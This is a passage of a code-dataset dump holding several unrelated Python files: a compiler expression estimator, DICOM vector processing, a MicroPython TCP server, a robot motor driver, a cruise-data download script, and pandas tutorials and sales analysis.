dispatch(\n self.binary_operator_dispatcher, expression.operator.value, expression.left, expression.right, left, right\n )\n\n def estimate_ref(self, ref: nodes.Ref) -> enodes.Expression:\n current_value = self.estimate_expression(ref.value)\n return enodes.Ref(current_value, initial_expression=ref.value)\n\n def estimate_cast(self, cast: nodes.Cast) -> enodes.Expression:\n value = self.estimate_expression(cast.value)\n if isinstance(cast.to_type, nodes.Name) and isinstance(value, enodes.Instance):\n assert isinstance(value.type, nodes.Name) and cast.to_type == value.type\n return value\n assert isinstance(cast.to_type, nodes.BuiltinType)\n if cast.to_type.value == nodes.BuiltinType.string.value:\n if isinstance(value, enodes.Instance):\n entry = self.env.get(value.type)\n assert isinstance(entry, entries.StructEntry)\n method_entry = entry.methods[\n submangle(nodes.Name(nodes.SpecialMethods.as_.value), self.context).member\n ]\n result = self.perform_function_call(\n method_entry.to_estimated_function(), arguments=[],\n self_argument=nodes.Argument(SELF_NAME, value.type, cast.value)\n )\n assert result\n return result\n elif isinstance(value, 
enodes.String):\n return value\n elif isinstance(value, enodes.Char):\n return enodes.String(value.value)\n elif isinstance(value, (enodes.Bool, enodes.Dict, enodes.Vector)):\n return enodes.String(value.to_code())\n elif isinstance(value, enodes.DynamicValue):\n assert isinstance(value.type, nodes.BuiltinType) and value.type.is_finite_int_type\n return enodes.DynamicValue(nodes.BuiltinType.string)\n assert isinstance(value, (enodes.Int, enodes.Float)), type(value)\n return enodes.String(str(value.value))\n assert isinstance(value, (enodes.Int, enodes.Float)), type(value)\n return enodes.Int(int(value.value), cast.to_type)\n\n def estimate_optional_some_call(self, call: nodes.OptionalSomeCall) -> enodes.Expression:\n return enodes.OptionalSomeCall(self.estimate_expression(call.value))\n\n def estimate_optional_some_value(self, value: nodes.OptionalSomeValue) -> enodes.Expression:\n some_call = self.estimate_expression(value.value)\n assert isinstance(some_call, enodes.OptionalSomeCall)\n return some_call.inner_value\n\n def estimate_optional_constructor(self, constructor: nodes.OptionalTypeConstructor) -> enodes.Expression:\n return enodes.OptionalConstructor(constructor.value)\n\n def estimate_integer_literal(self, literal: nodes.IntegerLiteral) -> enodes.Expression:\n int_type = self.infer_type(literal)\n assert isinstance(int_type, nodes.BuiltinType)\n return enodes.Int(int(literal.value), int_type)\n\n def estimate_decimal_literal(self, literal: nodes.DecimalLiteral) -> enodes.Expression:\n float_type = self.infer_type(literal)\n assert isinstance(float_type, nodes.BuiltinType)\n return enodes.Float(Decimal(literal.value), float_type)\n\n def estimate_string_literal(self, literal: nodes.StringLiteral) -> enodes.Expression:\n return enodes.String(literal.value)\n\n def estimate_char_literal(self, literal: nodes.CharLiteral) -> enodes.Expression:\n return enodes.Char(literal.value)\n\n def estimate_bool_literal(self, literal: nodes.BoolLiteral) -> enodes.Expression:\n return enodes.Bool(literal.value == nodes.BoolLiteral.true.value)\n\n def estimate_vector_literal(self, literal: nodes.VectorLiteral) -> enodes.Expression:\n vector_type = self.infer_type(literal)\n assert isinstance(vector_type, nodes.VectorType)\n return enodes.Vector([self.estimate_expression(element) for element in literal.elements], vector_type.subtype)\n\n def estimate_dict_literal(self, literal: nodes.DictLiteral) -> enodes.Expression:\n dict_type = self.infer_type(literal)\n assert isinstance(dict_type, nodes.DictType)\n return enodes.Dict(\n [self.estimate_expression(key) for key in literal.keys],\n [self.estimate_expression(value) for value in literal.values],\n dict_type.key_type, dict_type.value_type\n )\n\n def infer_type(self, expression: nodes.Expression, supertype: t.Optional[nodes.Type] = None) -> nodes.Type:\n self.type_checker.update_context(self.env, self.code)\n result = self.type_checker.infer_type(expression, supertype)\n return result.type\n\n def update_context(self, env: environment.Environment, code: errors.Code = None):\n self.env = env\n self.code = code or self.code\n\n def entry(self, name: nodes.Name) -> entries.Entry:\n if name.module:\n assert 0, \"Module system is not supported\"\n entry = self.env[name.member]\n assert entry is not None\n return entry\n\n def test(self):\n self.assertEqual(NODES, set(subclass.__name__ for subclass in self.node_dispatcher.keys()))\n self.assertEqual(EXPRESSIONS, set(subclass.__name__ for subclass in self.expression_dispatcher.keys()))\n 
self.assertEqual(ASSIGNMENTS, set(subclass.__name__ for subclass in self.assignment_dispatcher.keys()))\n\n\nEstimator = partial(\n Evaluator,\n EstimatedObjects(\n builtin_funcs=builtin_funcs, private_builtin_funcs=private_builtin_funcs, string_fields=string_fields, vector_fields=vector_fields, dict_fields=dict_fields\n )\n)\n","sub_path":"compiler/estimation.py","file_name":"estimation.py","file_ext":"py","file_size_in_byte":44453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492953596","text":"import itertools\nimport operator\nimport os\nimport pickle\n\nimport numpy as np\nimport pydicom as dicom\n\nimport collections\n\n\nclass VectorAverageCalc:\n\tdef __init__(self):\n\t\tself.pickledDataExists = True\n\t\tnormal_list = []\n\t\tif not self.pickledDataExists:\n\t\t\tself.hypertrophy_folder = \"../hypertrophy\"\n\t\t\thyp_folders = sorted(os.listdir(self.hypertrophy_folder))\n\n\t\t\tfor patient_folder in hyp_folders:\n\t\t\t\tfolder_path = os.path.join(self.hypertrophy_folder, patient_folder, \"la\")\n\t\t\t\tdcm_files = sorted(os.listdir(folder_path))\n\n\t\t\t\tdcm_files = [d for d in dcm_files if len(d.split('.')[-2]) < 4]\n\t\t\t\tif len(dcm_files) == 0: # sometimes the order number is missing at the end\n\t\t\t\t\tdcm_files = sorted(os.listdir(folder_path))\n\n\t\t\t\t# we only care about files that have a filename longer than 10 characters\n\t\t\t\tdcm_files = [d for d in dcm_files if len(d.split('.')[-2]) > 10]\n\n\t\t\t\tvector_list_in_folder = []\n\n\t\t\t\t# print(patient_folder)\n\n\t\t\t\tfor file in dcm_files:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttemp_ds = dicom.dcmread(os.path.join(folder_path, file))\n\t\t\t\t\t\t# We only want to store each orientation once\n\t\t\t\t\t\tif temp_ds.ImageOrientationPatient not in vector_list_in_folder:\n\t\t\t\t\t\t\tvector_list_in_folder.append(temp_ds.ImageOrientationPatient)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint('Exception while reading dcm file' + os.path.join(folder_path, file) + ': ' + repr(e))\n\n\t\t\t\t# We'll only save the ones that have three different normals in it, which are probably the ones that interest us the most\n\t\t\t\tif len(vector_list_in_folder) == 3:\n\t\t\t\t\t# This can probably be done in a much cleaner way\n\t\t\t\t\treshaped_vector_list_in_folder = np.asarray(vector_list_in_folder).reshape(3, 2, 3)\n\t\t\t\t\tnormal_list_in_folder = np.empty([3, 3])\n\t\t\t\t\tfor i in range(3):\n\t\t\t\t\t\tnormal_list_in_folder[i] = np.cross(reshaped_vector_list_in_folder[i][0], reshaped_vector_list_in_folder[i][1])\n\t\t\t\t\tnormal_list.append(normal_list_in_folder)\n\t\t\t\t\t# print(patient_folder)\n\n\t\t\tfile = open(\"pickled_data_limited\", 'wb')\n\t\t\tpickle.dump(normal_list, file)\n\t\t\tfile.close()\n\t\telse: # pickled data exists\n\t\t\tfile = open(\"pickled_data_limited\", 'rb')\n\t\t\tnormal_list = pickle.load(file)\n\t\t\tfile.close()\n\t\t# print(normal_list)\n\t\tfor i in range(3):\n\t\t\tfor normal in normal_list:\n\t\t\t\t# if len(normal) > 1:\n\t\t\t\tprint(normal[1][i])\n\t\t\tprint(\"\\n\")\n","sub_path":"vector_average_calc.py","file_name":"vector_average_calc.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636953646","text":"# #asyncio_echo_server_coroutine.py\n# # https://pymotw.com/3/asyncio/io_coroutine.html#echo-server\n#\n# import uasyncio\n# # import logging\n# import sys\n#\n# # SERVER_ADDRESS = ('localhost', 10000)\n# 
SERVER_ADDRESS = ('192.168.4.1', 8080)\n# # logging.basicConfig(\n# #     level=logging.DEBUG,\n# #     format='%(name)s: %(message)s',\n# #     stream=sys.stderr,\n# # )\n# # # log = logging.getLogger('main')\n#\n# event_loop = uasyncio.get_event_loop()\n#\n# async def echo(reader, writer):\n#     address = writer.get_extra_info('peername')\n#     # log = logging.getLogger('echo_{}_{}'.format(*address))\n#     print(('echo_{}_{}'.format(*address)))\n#     # log.debug('connection accepted')\n#     print('connection accepted')\n#\n#     while True:\n#         data = await reader.read(128)\n#\n#         if data:\n#             print(('received {!r}'.format(data)))\n#             writer.write(data)\n#             await writer.drain()\n#             # log.debug('sent {!r}'.format(data))\n#             print(('sent {!r}'.format(data)))\n#\n#         else:\n#             # log.debug('closing')\n#             print('closing')\n#             writer.close()\n#             return\n#\n# # Create the server and let the loop finish the coroutine before\n# # starting the real event loop.\n# factory = uasyncio.start_server(echo, *SERVER_ADDRESS)\n# server = event_loop.run_until_complete(factory)\n# # log.debug('starting up on {} port {}'.format(*SERVER_ADDRESS))\n# print(('starting up on {} port {}'.format(*SERVER_ADDRESS)))\n#\n# try:\n#     event_loop.run_forever()\n# except KeyboardInterrupt:\n#     pass\n# finally:\n#     # log.debug('closing server')\n#     print('closing server')\n#     server.close()\n#     event_loop.run_until_complete(server.wait_closed())\n#     # log.debug('closing event loop')\n#     print('closing event loop')\n#     event_loop.close()\n#\n#\n# # >>>\n# # >>> import main\n# # echo_192.168.4.2_42564\n# # connection accepted\n# # received b'GET / HTTP/1.1\\r\\nHost: 192.168.4.1:8080\\r\\nConnection: keep-alive\\r\\nUpgrade-Insecure-Requests: 1\\r\\nUser-Agent: Mozilla/5.0 (X11; Linu'\n# # Traceback (most recent call last):\n# #   File \"<stdin>\", line 1, in <module>\n# #   File \"main.py\", line 45, in <module>\n# #   File \"uasyncio/core.py\", line 180, in run_until_complete\n# #   File \"uasyncio/core.py\", line 154, in run_forever\n# #   File \"uasyncio/core.py\", line 109, in run_forever\n# #   File \"main.py\", line 31, in echo\n# # AttributeError: 'StreamWriter' object has no attribute 'write'\n\n\nimport uasyncio as asyncio\n\n@asyncio.coroutine\ndef serve(reader, writer):\n    print(reader, writer)\n    print(\"================\")\n    # print((yield from reader.read())) # orig\n    # print((yield from reader.read())) # mod readline\n    # line = yield from reader.readline()\n    line = yield from reader.read()\n    print('DBG line: {}, {}'.format(type(line), str(line))) # mod readline\n    yield from writer.awrite(\"HTTP/1.0 200 OK\\r\\n\\r\\nHello.\\r\\n\")\n    print(\"After response write\")\n    yield from writer.aclose()\n    print(\"Finished processing request\")\n\n\n# import logging\n#logging.basicConfig(level=logging.INFO)\n# logging.basicConfig(level=logging.DEBUG)\nloop = asyncio.get_event_loop()\n# loop.call_soon(asyncio.start_server(serve, \"127.0.0.1\", 8081))\nloop.call_soon(asyncio.start_server(serve, \"192.168.4.1\", 80))\nloop.run_forever()\nloop.close()\n\n","sub_path":"async-firmware-app/testing/tester-084-086/tcpserver.py","file_name":"tcpserver.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"66613601","text":"import Modules.Outputs.printing as pr\nimport Modules.Outputs.leds as leds\nimport time\nimport Other.what_robot as wr\nimport json\nimport Modules.Outputs.beeper as bp\nimport Other.variables as v\n\ndef setting_manager(action, what_to_write = \"\"): #has to be outside of class\n    try:\n        if action == 
\"read\":\n f = open(\"calibrated_motor_arrangement.txt\", \"r+\")\n return json.loads(str(f.read()).strip())\n elif action == \"write\":\n f = open(\"calibrated_motor_arrangement.txt\", \"w+\")\n f.write(json.dumps(what_to_write))\n print(\"Written to file successfully\")\n except Exception as e:\n pr.rprint(\"Could not write to json file. \", e, error_type=\"major\")\n\n\nclass Driver:\n def __init__(self, robot, motor_value): #motor_value is actually a reference to the motor value variable\n try:\n self.motor_values = motor_value\n self.robot = robot\n self.maneuvering = False\n self.en = 0\n self.sleep_time = 0\n self.ports = [\"outA\", \"outB\", \"outC\", \"outD\"]\n except Exception as e:\n pr.rprint(\"Could not initialise driver. \\n\", e, error_type=\"critical\")\n\n def motor_map(self, A, B, C, D, set_type = \"set\"):\n try:\n if set_type == \"set\":\n self.motor_values[\"a\"] = A\n self.motor_values[\"b\"] = B\n self.motor_values[\"c\"] = C\n self.motor_values[\"d\"] = D\n elif set_type == \"add\":\n self.motor_values[\"a\"] += A\n self.motor_values[\"b\"] += B\n self.motor_values[\"c\"] += C\n self.motor_values[\"d\"] += D\n except Exception as e:\n pr.rprint(\"Could not map motor values. \\n\", e, error_type=\"major\")\n\n #* Simple functions\n\n def straight(self, speed):\n try:\n self.robot.motor_values[\"a\"] += speed \n self.robot.motor_values[\"b\"] -= speed\n self.robot.motor_values[\"c\"] += speed\n self.robot.motor_values[\"d\"] -= speed\n except Exception as e:\n pr.rprint(\"Could not go straight. \\n\", e, error_type=\"major\")\n \n def hard_r(self, speed):\n try:\n self.motor_values[\"a\"] -= speed\n self.motor_values[\"b\"] += speed\n self.motor_values[\"c\"] += speed\n self.motor_values[\"d\"] -= speed\n except Exception as e:\n pr.rprint(\"Could not go hard right. \\n\", e, error_type=\"major\")\n \n def hard_l(self, speed):\n try:\n self.motor_values[\"a\"] += speed\n self.motor_values[\"b\"] -= speed\n self.motor_values[\"c\"] -= speed\n self.motor_values[\"d\"] += speed\n except Exception as e:\n pr.rprint(\"Could not go hard left. \\n\", e, error_type=\"major\")\n \n def sideways(self, speed, side):\n try:\n if side.lower() == \"r\":\n self.motor_values[\"a\"] = 0\n self.motor_values[\"b\"] = 0\n self.motor_values[\"c\"] += speed\n self.motor_values[\"d\"] -= speed\n elif side.lower() == \"l\":\n self.motor_values[\"a\"] += speed\n self.motor_values[\"b\"] -= speed\n self.motor_values[\"c\"] = 0\n self.motor_values[\"d\"] = 0\n except Exception as e:\n pr.rprint(\"Could not go sideways. \\n\", e, error_type=\"major\")\n \n def rotate(self, timee, speeed):\n try:\n self.robot.motor_a.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_b.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_c.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_d.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n time.sleep(timee + 0.2)\n self.robot.motor_a.stop()\n self.robot.motor_b.stop()\n self.robot.motor_c.stop()\n self.robot.motor_d.stop()\n time.sleep(0.4)\n except Exception as e:\n pr.rprint(\"Could not rotate. \\n\", e, error_type=\"major\")\n def brake_all(self):\n try:\n try:\n self.robot.motor_a.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor a. \\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_b.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor b. 
\\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_c.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor c. \\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_d.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor d. \\n\", e, error_type = \"critical\")\n except Exception as e:\n pr.rprint(\"Could not stop. \\n\", e, error_type=\"major\")\n\n def drive(self, drive_type = \"proportional\"):\n try:\n new = [self.motor_values[\"a\"], self.motor_values[\"b\"], self.motor_values[\"c\"],self.motor_values[\"d\"]]\n old = [self.motor_values[\"old\"][\"a\"], self.motor_values[\"old\"][\"b\"], self.motor_values[\"old\"][\"c\"], self.motor_values[\"old\"][\"d\"]]\n percentageOffset = 1\n #print(self.robot.motor_values[\"a\"], self.robot.motor_values[\"b\"] , self.robot.motor_values[\"c\"] , self.robot.motor_values[\"d\"]) \n\n if drive_type == \"proportional\": #proportionally scales the values\n for neww, oldd in zip(new, old):\n if neww != oldd: #makes sure if we need to recalculate everything\n maxx = max(new)\n minn = min(new)\n if maxx > 100:\n percentageOffset = 100 / abs(maxx)\n elif minn < -100:\n percentageOffset = 100 / abs(minn)\n motor_temp = [item * percentageOffset for item in new] #fast boi list comprehension\n self.motor_values[\"a\"] = int(motor_temp[0])\n self.motor_values[\"b\"] = int(motor_temp[1])\n self.motor_values[\"c\"] = int(motor_temp[2])\n self.motor_values[\"d\"] = int(motor_temp[3])\n break #*makes sure we only do this once\n\n elif drive_type == \"clamp\": #clamps the values\n for neww, oldd in zip(new, old):\n if neww != oldd: #again making sure that we don't mess with random stuff\n self.motor_values[\"a\"] = max(min(self.motor_values[\"a\"], 100), -100)\n self.motor_values[\"b\"] = max(min(self.motor_values[\"b\"], 100), -100)\n self.motor_values[\"c\"] = max(min(self.motor_values[\"c\"], 100), -100)\n self.motor_values[\"d\"] = max(min(self.motor_values[\"d\"], 100), -100)\n break #*makes sure we only do this once\n\n \n #next chunk of code makes sure that we don't write motor value to motors with the same value\n\n #if self.motor_values[\"a\"] != old[0]:\n try:\n self.robot.motor_a.run_direct(duty_cycle_sp = self.motor_values[\"a\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_a. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_b.run_direct(duty_cycle_sp = self.motor_values[\"b\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_b. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_c.run_direct(duty_cycle_sp = self.motor_values[\"c\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_c. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_d.run_direct(duty_cycle_sp = self.motor_values[\"d\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_d. \\n\", e, error_type=\"critical\")\n \n self.robot.motor_values[\"old\"] = { #set the new old values lol\n \"a\": old[0],\n \"b\": old[1],\n \"c\": old[2],\n \"d\": old[3]\n }\n time.sleep(self.sleep_time) #if there is a set time delay then do it. 
Useful for when stuck against wall\n            self.robot.motor_values[\"a\"] = 0\n            self.robot.motor_values[\"b\"] = 0\n            self.robot.motor_values[\"c\"] = 0\n            self.robot.motor_values[\"d\"] = 0\n            self.robot.extra_offset = 0\n            self.sleep_time = 0\n        except Exception as e:\n            pr.rprint(\"Could not drive motors. \\n\", e, error_type=\"major\")\n\n    # todo: complex functions (such as trig driver)\n    \n    #* Helper methods\n\n    def copy_motor_values(self):\n        try:\n            return {\n                \"new\": [self.motor_values[\"a\"], self.motor_values[\"b\"], self.motor_values[\"c\"],self.motor_values[\"d\"]],\n                \"old\": [self.motor_values[\"old\"][\"a\"], self.motor_values[\"old\"][\"b\"], self.motor_values[\"old\"][\"c\"], self.motor_values[\"old\"][\"d\"]]\n            }\n        except Exception as e:\n            pr.rprint(\"Failed to copy motor values. \\n\", e, error_type=\"major\")\n            return None\n    \n    def motor_speeds(self):\n        try:\n            return [self.robot.motor_a.speed, self.robot.motor_b.speed, self.robot.motor_c.speed, self.robot.motor_d.speed]\n        except Exception as e:\n            pr.rprint(\"Error with returning motor speeds: \\n\", e)\n            return [0,0,0,0]\n    \n    def check_if_robot_halted(self):\n        try:\n            motorSpeeds = self.motor_speeds()\n            #halted only if every motor speed sits inside the near-zero band\n            for item in motorSpeeds:\n                if item not in range(-100, 100):\n                    return False\n            return True\n        except Exception as e:\n            pr.rprint(\"Error with checking if robot halted: \\n\", e)\n            return False\n    \n    def antistuck(self): #aka check if robot halted but actually working\n        try:\n            start_time = time.time()\n            # the real antistuck\n            while (time.time() - start_time) < 1.5:\n                self.robot.sensor_methods.refresh_f_ir()\n                f_ir = self.robot.f_ir_value\n                self.robot.sensor_methods.refresh_b_ir()\n                b_ir = self.robot.b_ir_value\n\n                self.robot.sensor_methods.refresh_cmps()\n                self.robot.sensor_methods.compass_adjustment()\n\n                if f_ir > 0 or b_ir > 0:\n                    self.straight(100)\n                    self.drive(\"proportional\")\n                    break\n                else:\n                    self.straight(100)\n                    self.drive(\"proportional\")\n            else:\n                start_time = time.time()\n                while (time.time() - start_time) < 1.5:\n                    self.robot.sensor_methods.refresh_f_ir()\n                    f_ir = self.robot.f_ir_value\n                    self.robot.sensor_methods.refresh_b_ir()\n                    b_ir = self.robot.b_ir_value\n\n                    self.robot.sensor_methods.refresh_cmps()\n                    self.robot.sensor_methods.compass_adjustment()\n\n                    if f_ir > 0 or b_ir > 0:\n                        self.straight(-100)\n                        self.drive(\"proportional\")\n                        break\n                    else:\n                        self.straight(-100)\n                        self.drive(\"proportional\")\n        except Exception as e:\n            pr.rprint(\"Error with antistuck: \\n\", e)\n            return False\n    \n    def calibrate_motors(self):\n        try:\n            self.robot.init_motors([\"outA\",\"outB\",\"outC\",\"outD\"], [0,0,0,0])\n            leds.led_change(\"wait\")\n            motor = [None, None, None, None]\n            actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n            for n in range(0, 4):\n                bp.beep(864, 100)\n                print(\"You are now writing to the \", n + 1 , \"st motor\")\n                while motor[n] == None:\n                    actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n                    for index, item in enumerate(actual_value):\n\n                        if item > 100 or item < -100:\n                            if item >= 0:\n                                motor[n] = [self.ports[index], 0]\n                            else:\n                                motor[n] = [self.ports[index], 1]\n                            print(motor[n], self.ports[n])\n                            \n                            while actual_value[index] != 0:\n                                actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n            leds.led_change(\"fixed\")\n            bp.beep(440, 200)\n            bp.beep(523.25, 100)\n            bp.beep(659.25, 100)\n            return { str(wr.robot_type): motor } 
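# calibrated result: maps this robot type to a list of [output port, polarity] per motor slot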
\n        except Exception as e:\n            pr.rprint(\"Could not successfully calibrate motors. Defaulting to previous version...\", e, error_type=\"major\")\n            return {}\n    \n    def maneuver(self, funktion, duration, *args, **kwargs):\n        try:\n            start_time = time.time()\n            if not self.maneuvering:\n                self.maneuvering = True\n            while self.maneuvering:\n                #thing here\n                if (-start_time + time.time()) >= duration:\n                    self.maneuvering = False\n                funktion(*args, **kwargs)\n        except Exception as e:\n            pr.rprint(\"Could not perform maneuver. \", e, error_type=\"major\")\n    \n    def calibration(self):\n        try:\n            self.rotate(6, 200) #work on it\n            self.rotate(6, 200)\n        except Exception as e:\n            pr.rprint(\"Could not perform calibration. \", e, error_type=\"major\")","sub_path":"Modules/Outputs/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":14549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"140828430","text":"import os\nfrom cmapingest import vault_structure as vs\n\n\nodir = vs.collected_data + \"insitu/cruise/misc_cruise/KM0704_CMORE_BULA/\"\n\n\ndef download_KM0704_data(outputdir, download_link):\n    wget_str = f\"\"\"wget -P '{outputdir}' -np -R \"'index.html*\" robots=off -nH --cut-dirs 8 -r {download_link}\"\"\"\n    os.system(wget_str)\n\n\n# #download ctd\ndownload_KM0704_data(\n    odir + \"CTD/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/ctd/bula1/\"\n)\n\n# download bottle\ndownload_KM0704_data(\n    odir + \"bottle/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/water/bula1/\"\n)\n\n# download underway\ndownload_KM0704_data(\n    odir + \"underway/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/underway/bula1/\"\n)\n\n# download wind\ndownload_KM0704_data(\n    odir + \"wind/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/winds/bula1\"\n)\n","sub_path":"insitu/cruise/misc_cruise/KM0704_CMORE_BULA/collect_KM0704_CMORE_BULA.py","file_name":"collect_KM0704_CMORE_BULA.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"346718090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 08:00:02 2020\n\n@author: jeffe\n\"\"\"\n\n\nimport pandas as pd \n\n\npath_guardado = 'C://Users//jeffe//Documents//GIT//python//py-collantes-yunga-jefferson-paul//03 - pandas//data//artwork_data.pickle'\ndf = pd.read_pickle(path_guardado)\n\n\n#loc\n#used to select rows and columns by label\n#primero = df.loc[1035,'artist']\nfiltrado_horizontal = df.loc[1035]\n\nprint(filtrado_horizontal)\nprint(filtrado_horizontal['artist'])\nprint(filtrado_horizontal.index)#column labels \n\nserie_vertical = df['artist']\n\nprint (serie_vertical)\nprint(serie_vertical.index)\n\n#filter by index\n\ndf_1035 = df[df.index==1035]\n\nsegundo = df.loc[1035]#filter by a single index \nsegundo = df.loc[[1035,1036]]#Filter by a list of labels\nsegundo = df.loc[3:5]#Filter from one index x to another index y \n\nsegundo = df.loc[1035,'artist']#one column label\nsegundo = df.loc[1035,['artist','medium']]#several column labels\n\n#iloc\ntercero = df.iloc[0]\ntercero = df.iloc[[0,1]]\ntercero = df.iloc[df.index == 1035]\n\ntercero = df.iloc[0:10,0:4]\n\n\n##########\ndatos = {\n    \"nota 1\":{\n        \"Pepito\":7,\n        \"Juanita\":8,\n        \"Maria\":9},\n    \"nota 2\":{\n        \"Pepito\":7,\n        \"Juanita\":8,\n        \"Maria\":9},\n    \"disciplina\":{\n        \"Pepito\":4,\n        \"Juanita\":9,\n        \"Maria\":2}}\n\nnotas = pd.DataFrame(datos)\n\ncondicion_nota = notas[\"nota 1\"] > 7\ncondicion_nota_dos = notas[\"nota 2\"] > 7\ncondicion_disc = notas[\"disciplina\"] > 7 \n\nmayores_siete = 
notas.loc[condicion_nota,[\"nota 1\"]]\n\npasaron = notas.loc[condicion_nota][condicion_nota_dos][condicion_disc]\n\nnotas.loc[\"Maria\",\"disciplina\"] = 7\n\n#set every student's discipline record to 7 \nnotas.loc[:,\"disciplina\"]=7\n\n#add up each student's grades and divide by 3 \nsuma_notas = notas[\"nota 1\"] + notas[\"nota 2\"] +notas[\"disciplina\"]\n\ndividir_notas = suma_notas /3\n\n\n\n\n\n\n\n\n\n","sub_path":"03 - pandas/g_iloc_loc.py","file_name":"g_iloc_loc.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"424323583","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pylab as plt\nfrom pandas import Series, DataFrame\n\ntrain = pd.read_csv('E:\\lga\\\\time\\sales_train_v2.csv', encoding='utf-8')\ndf_items = pd.read_csv('E:\\lga\\\\time\\items.csv', encoding='utf-8')\ntrain_1 = pd.merge(train ,df_items ,how='left')\ntrain_1.set_index([\"shop_id\"], inplace=True)\nfor i in range(0,60):\n    df_x = train_1.loc[i,:]\n    df_x.to_csv('E:\\\\lga\\\\time\\\\shop\\\\shop_{shop_id}.csv'.format(shop_id=i), encoding='utf-8')\n    print('succeed')\n\n\n#analyze the first shop\nshop_0 = pd.read_csv(\"E:\\lga\\\\time\\\\shop\\shop_0.csv\", encoding='utf-8')\nshop_0.head()\ndel shop_0['item_name'] #drop a column\nshop_0.describe()\ngroup1 = shop_0.groupby('item_cnt_day')\ngroup1.size() #get the distribution of item_cnt_day\ngroup2 = shop_0.groupby(['item_cnt_day','item_category_id'])\ngroup2.size()\n\n\n#visualize each shop's daily total sales per month across the two years\nshop_0_series = shop_0.loc[:,['date','item_cnt_day']]\nshop_0_series.index = shop_0_series['date']\ndel shop_0_series['date']\nshop_0_series.index = pd.to_datetime(shop_0_series.index, format='%d.%m.%Y')\nshop_0_series['item_cnt_day'] = shop_0_series['item_cnt_day'].astype(int) #convert item_cnt_day to integer type\ngroup3 = shop_0_series.groupby(shop_0_series.index)\ntimelist = group3.size()\ntimelist = list(timelist.index) #collect the time points into a list\ntimelist_0 = []\nfor x in range(0, len(timelist)):\n    str_1 = str(timelist[x])[0:10]\n    timelist_0.append(str_1)\n    print('succeed') #convert each timestamp in timelist to str\n\ndef shop_item_cnt_sum(timelist, shop):\n    #build a new df; shop must be a single item_cnt_day column indexed by date\n    df = DataFrame(columns=('date', 'item_cnt_day'))\n\n    for i in timelist:\n        A = sum(shop[i]['item_cnt_day'])\n        row = DataFrame({'date':[i], 'item_cnt_day':[A]})\n        df = df.append(row, ignore_index=True)\n\n    df.index = df['date']\n    df.index = pd.to_datetime(df.index, format='%Y-%m-%d')\n    return df\n\n\n#take every shop, sum each one's sales and draw them all on one line chart\nfor i in range(0,60):\n    shop_series = pd.read_csv(\"E:\\lga\\\\time\\\\shop\\shop_{0}.csv\".format(i), encoding='utf-8')\n    del shop_series['item_name']\n    shop_series = shop_series.loc[:, ['date', 'item_cnt_day']]\n    shop_series.index = shop_series['date']\n    del shop_series['date']\n    shop_series.index = pd.to_datetime(shop_series.index, format='%d.%m.%Y')\n    A = shop_item_cnt_sum(timelist_0, shop_series)\n    A['item_cnt_day'].plot()\nplt.show()\n\n\n#aggregate the training set's total sales volume by month\ntrain = pd.read_csv('E:\\lga\\\\time\\sales_train_v2.csv', encoding='utf-8')\ntrain_0 = train.loc[:,['date_block_num','item_cnt_day']]\ntrain_0.index = train_0['date_block_num']\ndef shop_item_cnt_sum(train_0):\n    #build a new df of monthly totals indexed by date_block_num\n    df = DataFrame(columns=('date_block_num_all', 'item_cnt_day'))\n    for i in range(0,34):\n        A =sum(train_0[train_0.loc[:,'date_block_num']==i]['item_cnt_day'])\n        row = DataFrame({'date_block_num_all': [i], 'item_cnt_day': [A]})\n        df = df.append(row, ignore_index=True)\n    return 
